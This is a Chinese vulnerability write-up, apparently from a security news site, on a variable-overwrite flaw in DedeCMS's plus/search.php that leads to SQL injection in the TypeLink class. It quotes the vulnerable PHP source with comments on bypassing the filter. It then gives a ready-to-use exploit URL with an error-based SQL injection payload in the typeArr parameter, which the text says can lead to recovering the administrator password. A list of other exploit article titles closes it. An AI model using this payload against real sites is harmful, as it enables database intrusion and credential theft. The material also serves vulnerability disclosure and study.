Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.

require_once(dirname(__FILE__).”/../include/common.inc.php”);

require_once(DEDEINC.”/arc.searchview.class.php”);

$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;

$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;

$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;

$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;

$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;

if(!isset($orderby)) $orderby=”;

else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);

if(!isset($searchtype)) $searchtype = ‘titlekeyword’;

else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);

if(!isset($keyword)){

if(!isset($q)) $q = ”;

$keyword=$q;

}

$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

//查找栏目信息

if(empty($typeid))

{

$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;

if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )

{

$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);

fwrite($fp, “<”.”?phprn”);

$dsql->SetQuery(“Select id,typename,channeltype From `dede_arctype`”);

$dsql->Execute();

while($row = $dsql->GetArray())

{

fwrite($fp, “$typeArr[{$row[\'id\']}] = ‘{$row[\'typename\']}’;rn”);

}

fwrite($fp, ‘?’.\'>’);

fclose($fp);

}

//引入栏目缓存并看关键字是否有相关栏目内容

require_once($typenameCacheFile);

//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个

//

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

$keywordn = str_replace($typename, ‘ ‘, $keyword); //这个地方要绕过

if($keyword != $keywordn)

{

$keyword = $keywordn;

$typeid = $id; // 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设

break;

}

}

}

}

然后plus/search.php文件下面定义了一个 Search类的对象 .

在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.

$this->TypeLink = new TypeLink($typeid);

TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了

… )直接带入了sql语句.

class TypeLink

{

var $typeDir;

var $dsql;

var $TypeID;

var $baseDir;

var $modDir;

var $indexUrl;

var $indexName;

var $TypeInfos;

var $SplitSymbol;

var $valuePosition;

var $valuePositionName;

var $OptionArrayList;

//构造函数///////

//php5构造函数

function __construct($typeid)

{

$this->indexUrl = $GLOBALS[\'cfg_basehost\'].$GLOBALS[\'cfg_indexurl\'];

$this->indexName = $GLOBALS[\'cfg_indexname\'];

$this->baseDir = $GLOBALS[\'cfg_basedir\'];

$this->modDir = $GLOBALS[\'cfg_templets_dir\'];

$this->SplitSymbol = $GLOBALS[\'cfg_list_symbol\'];

$this->dsql = $GLOBALS[\'dsql\'];

$this->TypeID = $typeid;

$this->valuePosition = ”;

$this->valuePositionName = ”;

$this->typeDir = ”;

$this->OptionArrayList = ”;

//载入类目信息

$query = “SELECT tp.*,ch.typename as //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿

ctypename,ch.addtable,ch.issystem FROM `dede_arctype` tp left join

`dede_channeltype` ch

on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;

if($typeid > 0)

{

$this->TypeInfos = $this->dsql->GetOne($query);

利用代码一 需要 即使magic_quotes_gpc = Off

本帖隐藏的内容

http://www.secye.com/plus/search.php?typeArr[2%27%20and%20@%60%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title

本文来源：SecYe安全网[http://www.secye.com] (责任编辑：SecYe安全)

• ·微软Internet Explorer浏览器Jscript.Dll
• ·CVE-2019-0708远程桌面代码执行漏洞复现
• ·Harbor任意管理员注册漏洞
• ·微软RDP远程代码执行漏洞（CVE-2019-0708
• ·有上传文件的文件名处发现的时间延迟注入
• ·Xstream远程代码执行漏洞
• ·文本编辑器VimNeovim被曝任意代码执行漏
• ·PHPCMS v9.6.0 wap模块SQL注入 | FreeBuf
• ·戴尔电脑自带系统软件SupportAssist存在R
• ·CatFish CMS V4.8.75最新版XSS漏洞审计
• ·Easy WP SMTP（v1.3.9）0 day漏洞被攻击
• ·Weblogic反序列化远程代码执行漏洞（CVE-
• ·【漏洞预警】Weblogic反序列化远程命令执
• ·ThinkPHP 5.1框架结合RCE漏洞的深入分析
• ·WordPress Core 5.0 - Remote Code Execu
• ·NetSetMan 4.7.1 - Local Buffer Overflo